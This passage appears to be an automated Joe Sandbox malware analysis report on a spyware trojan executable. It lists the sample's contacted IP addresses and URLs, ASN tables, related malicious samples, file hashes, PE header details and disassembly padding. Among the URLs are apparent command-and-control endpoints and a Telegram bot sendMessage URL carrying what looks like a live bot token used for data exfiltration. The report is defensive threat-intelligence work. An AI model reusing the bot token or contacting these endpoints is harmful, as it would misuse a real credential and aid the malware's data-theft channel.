                                                    http://167.99.138.249:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://167.99.138.249:8080/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://185.217.98.121:8080/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage?chat_id=7259173ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmp, 73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FF62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://45.82.65.63/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://185.217.98.121:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://206.189.109.14673ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://206.189.109.146:80/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://185.217.98.121:8080/hX8i6V7aqg/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://206.166.251.4:8080/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://194.164.198.113:8080/2r1j6_user%40358075_report.wsr73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://47.96.78.224:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://206.166.251.473ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://154.9.207.142:44373ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://46.4.73.11873ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://8.134.71.132:808273ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://185.217.98.121:8080/2r1j6_user73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://206.166.251.4:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://ac.ecosia.org?q=73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://185.217.98.121:80802(73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://194.164.198.113:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://api.telegram.org/bot7972507107:AAE0InlBzYqTeRUoXqUM9ewqhQJZRxDPcsE/sendMessage73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://101.126.19.171:8073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://95.216.147.179:80/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%7273ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://116.202.101.219:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://185.217.98.12173ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.ecosia.org/newtab/v20w73ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://38.60.191.38:8073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://46.4.73.118:900073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://185.217.98.121:8080/get73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://5.196.181.135/2r1j6_user%40358075_report.wsrp73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://46.4.73.118:9000/%32%72%31%6A%36%5F%68%75%62%65%72%74%40%33%35%38%30%37%35%5F%72%65%70%6F%72%73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FE14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://duckduckgo.com/chrome_newtabv2073ybGtnYXx.exe, 00000000.00000002.1806040453.000001B620557000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.tele73ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FECB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://101.132.223.26:808073ybGtnYXx.exe, 00000000.00000002.1802838453.000001B60FC01000.00000004.00000800.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                208.95.112.1
                                                                ip-api.comUnited States
                                                                53334TUT-ASUSfalse
                                                                206.189.109.146
                                                                unknownUnited States
                                                                14061DIGITALOCEAN-ASNUStrue
                                                                149.154.167.220
                                                                api.telegram.orgUnited Kingdom
                                                                62041TELEGRAMRUfalse
                                                                167.99.138.249
                                                                unknownUnited States
                                                                14061DIGITALOCEAN-ASNUStrue
                                                                46.4.73.118
                                                                unknownGermany
                                                                24940HETZNER-ASDEtrue
                                                                206.166.251.4
                                                                unknownUnited States
                                                                7816CTCUStrue
                                                                95.216.147.179
                                                                unknownGermany
                                                                24940HETZNER-ASDEtrue
                                                                45.82.65.63
                                                                unknownUnited Kingdom
                                                                208862SIRINFO-ASITtrue
                                                                185.217.98.121
                                                                unknownIsrael
                                                                61102INTERHOSTILtrue
                                                                5.196.181.135
                                                                unknownFrance
                                                                16276OVHFRtrue
                                                                194.164.198.113
                                                                unknownUnited Kingdom
                                                                8897KCOM-SPNService-ProviderNetworkex-MistralGBtrue
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1640529
                                                                Start date and time:2025-03-17 12:26:16 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 7s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:22
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:73ybGtnYXx.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:ea08b197bbe8bc874a5c65500db03bf2.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@19/2@3/11
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 99%
                                                                • Number of executed functions: 15
                                                                • Number of non-executed functions: 8
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.242.39.171, 23.199.214.10
                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                TimeTypeDescription
                                                                07:27:15API Interceptor837737x Sleep call for process: 73ybGtnYXx.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                208.95.112.1yeah.exeGet hashmaliciousXWormBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                PO-2513203-PDF.jsGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                Q3N5HdmTIp.exeGet hashmaliciousUnknownBrowse
                                                                • ip-api.com/line?fields=query
                                                                Q3N5HdmTIp.exeGet hashmaliciousUnknownBrowse
                                                                • ip-api.com/line?fields=query
                                                                XWCTtOuD5e.exeGet hashmaliciousPython Stealer, Exela Stealer, NjratBrowse
                                                                • ip-api.com/json
                                                                WindowsDefender.exeGet hashmaliciousPython Stealer, Blank Grabber, Umbral StealerBrowse
                                                                • ip-api.com/json/?fields=225545
                                                                Setup.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                • ip-api.com/json/?fields=225545
                                                                Planck Scale Lantern.exeGet hashmaliciousPureLog Stealer, XWorm, zgRATBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                Setup(1).exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                • ip-api.com/json/?fields=225545
                                                                ExLoader_Installer.exeGet hashmaliciousPython Stealer, Blank Grabber, Umbral Stealer, XWormBrowse
                                                                • ip-api.com/json/?fields=225545
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                ip-api.comyeah.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                PO-2513203-PDF.jsGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Q3N5HdmTIp.exeGet hashmaliciousUnknownBrowse
                                                                • 208.95.112.1
                                                                Q3N5HdmTIp.exeGet hashmaliciousUnknownBrowse
                                                                • 208.95.112.1
                                                                XWCTtOuD5e.exeGet hashmaliciousPython Stealer, Exela Stealer, NjratBrowse
                                                                • 208.95.112.1
                                                                WindowsDefender.exeGet hashmaliciousPython Stealer, Blank Grabber, Umbral StealerBrowse
                                                                • 208.95.112.1
                                                                Setup.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                • 208.95.112.1
                                                                Planck Scale Lantern.exeGet hashmaliciousPureLog Stealer, XWorm, zgRATBrowse
                                                                • 208.95.112.1
                                                                Setup(1).exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                • 208.95.112.1
                                                                ExLoader_Installer.exeGet hashmaliciousPython Stealer, Blank Grabber, Umbral Stealer, XWormBrowse
                                                                • 208.95.112.1
                                                                api.telegram.orgShipping Documents - SI078534.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Transaction_receipt520.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Shipment Document BL,INV and packing list.pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                • 149.154.167.220
                                                                sryxen-built.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                HSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                QUOTATION#0033546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Teklif Talebi #U0130hale No-14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                TELEGRAMRUShipping Documents - SI078534.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Transaction_receipt520.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Shipment Document BL,INV and packing list.pdf.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                • 149.154.167.220
                                                                sryxen-built.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                HSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                QUOTATION#0033546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Teklif Talebi #U0130hale No-14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Purchase Order.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 149.154.167.220
                                                                DHL - FINAL NOTICE - OVERDUE ACCOUNT - 1301609845.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                TUT-ASUSyeah.exeGet hashmaliciousXWormBrowse
                                                                • 208.95.112.1
                                                                PO-2513203-PDF.jsGet hashmaliciousAgentTeslaBrowse
                                                                • 208.95.112.1
                                                                Q3N5HdmTIp.exeGet hashmaliciousUnknownBrowse
                                                                • 208.95.112.1
                                                                Q3N5HdmTIp.exeGet hashmaliciousUnknownBrowse
                                                                • 208.95.112.1
                                                                XWCTtOuD5e.exeGet hashmaliciousPython Stealer, Exela Stealer, NjratBrowse
                                                                • 208.95.112.1
                                                                WindowsDefender.exeGet hashmaliciousPython Stealer, Blank Grabber, Umbral StealerBrowse
                                                                • 208.95.112.1
                                                                Setup.exeGet hashmaliciousPython Stealer, Blank GrabberBrowse
                                                                • 208.95.112.1
                                                                Planck Scale Lantern.exeGet hashmaliciousPureLog Stealer, XWorm, zgRATBrowse
                                                                • 208.95.112.1
                                                                Setup(1).exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                • 208.95.112.1
                                                                ExLoader_Installer.exeGet hashmaliciousPython Stealer, Blank Grabber, Umbral Stealer, XWormBrowse
                                                                • 208.95.112.1
                                                                DIGITALOCEAN-ASNUShttps://app.eraser.io/workspace/32c12MLUJSCjts5wfE3E?origin=shareGet hashmaliciousHTMLPhisherBrowse
                                                                • 138.197.132.229
                                                                Spoofer.exeGet hashmaliciousLodaRATBrowse
                                                                • 206.189.80.59
                                                                S6d0gHq1r3.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 95.85.2.23
                                                                hgfs.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 104.248.130.66
                                                                hgfs.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 134.122.7.16
                                                                https://sheingivesback.comGet hashmaliciousUnknownBrowse
                                                                • 64.225.91.73
                                                                http://onllyfans.me/Get hashmaliciousUnknownBrowse
                                                                • 128.199.106.47
                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 5.101.107.92
                                                                http://marina84.com/food/Get hashmaliciousUnknownBrowse
                                                                • 165.227.200.87
                                                                Bank_Statement.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 159.89.102.253
                                                                DIGITALOCEAN-ASNUShttps://app.eraser.io/workspace/32c12MLUJSCjts5wfE3E?origin=shareGet hashmaliciousHTMLPhisherBrowse
                                                                • 138.197.132.229
                                                                Spoofer.exeGet hashmaliciousLodaRATBrowse
                                                                • 206.189.80.59
                                                                S6d0gHq1r3.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                • 95.85.2.23
                                                                hgfs.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 104.248.130.66
                                                                hgfs.mips.elfGet hashmaliciousUnknownBrowse
                                                                • 134.122.7.16
                                                                https://sheingivesback.comGet hashmaliciousUnknownBrowse
                                                                • 64.225.91.73
                                                                http://onllyfans.me/Get hashmaliciousUnknownBrowse
                                                                • 128.199.106.47
                                                                arm7.elfGet hashmaliciousMiraiBrowse
                                                                • 5.101.107.92
                                                                http://marina84.com/food/Get hashmaliciousUnknownBrowse
                                                                • 165.227.200.87
                                                                Bank_Statement.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                • 159.89.102.253
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0eyeah.exeGet hashmaliciousXWormBrowse
                                                                • 149.154.167.220
                                                                Shipping Documents - SI078534.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Transaction_receipt520.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                • 149.154.167.220
                                                                sryxen-built.exeGet hashmaliciousUnknownBrowse
                                                                • 149.154.167.220
                                                                WizClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                • 149.154.167.220
                                                                HSBC01703025_PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                QUOTATION#0033546.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                Teklif Talebi #U0130hale No-14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                BOM N012-001 231109.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 149.154.167.220
                                                                c12f54a3f91dc7bafd92cb59fe009a35captcha.txt.vbsGet hashmaliciousQuasarBrowse
                                                                • 5.196.181.135
                                                                test.vbsGet hashmaliciousQuasarBrowse
                                                                • 5.196.181.135
                                                                Ld0lvdQ1Rn.exeGet hashmaliciousDCRatBrowse
                                                                • 5.196.181.135
                                                                d6rzahY8IU.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                • 5.196.181.135
                                                                KF2ZqmJMeN.exeGet hashmaliciousDCRatBrowse
                                                                • 5.196.181.135
                                                                nj.exeGet hashmaliciousQuasarBrowse
                                                                • 5.196.181.135
                                                                SQPKHjjgui.exeGet hashmaliciousUnknownBrowse
                                                                • 5.196.181.135
                                                                Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                                                • 5.196.181.135
                                                                Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                • 5.196.181.135
                                                                Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                                                • 5.196.181.135
                                                                No context
                                                                Process:C:\Users\user\Desktop\73ybGtnYXx.exe
                                                                File Type:CSV text
                                                                Category:dropped
                                                                Size (bytes):1498
                                                                Entropy (8bit):5.364175471524945
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoC1qE4GIs0E4K6sXE4Npv:MxHKQEAHKKkKYHKGSI6oPtHTHK1qHGI8
                                                                MD5:1B713A2FD810C1C9A8F6F6BE36F406B1
                                                                SHA1:0828576CB8B83C21F36AD29E327D845AB3574EBB
                                                                SHA-256:E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
                                                                SHA-512:D32200B7FA9D0DFEF4011D98D40260838A522E63C874FBCCE00D331D663169DBE1C613AD0E81C76F69A8CE6C7265605175CA75BA2C8BDA7748290B34579E148B
                                                                Malicious:true
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                                Process:C:\Users\user\Desktop\73ybGtnYXx.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.284198358794784
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                File name:73ybGtnYXx.exe
                                                                File size:138'752 bytes
                                                                MD5:ea08b197bbe8bc874a5c65500db03bf2
                                                                SHA1:3cbe0f9a6bb6c1600e196d3c2b54132c72ccce0d
                                                                SHA256:03423b8784cac66602f6dc04f6303668951e9c7280a80535a708d59e6cf82312
                                                                SHA512:1baa6ee1970ae01c916d00a2727016a458d3bc6a43c9cfe707ccf73d687c190e88781a596661ee302feae53c5671f478a552177d74ce2a4334ad4daa5674bf10
                                                                SSDEEP:1536:k3WaMTxYajhMDWWWxD4krrQz46vdszbLpQqVD9bMEqb01XTmUOr87dOPAUVHWHth:6ajYWCkrr3wdAbbD9bMEqo1AWz7bPCe
                                                                TLSH:C2D3B496B2959FA1D99A8C7E81B25730037059068EC1FF0599DEF1902DC32C8EB176EF
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............~0... ...@....@.. ....................................`................................
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x42307e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0xE7D68599 [Fri Apr 3 11:16:41 2093 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
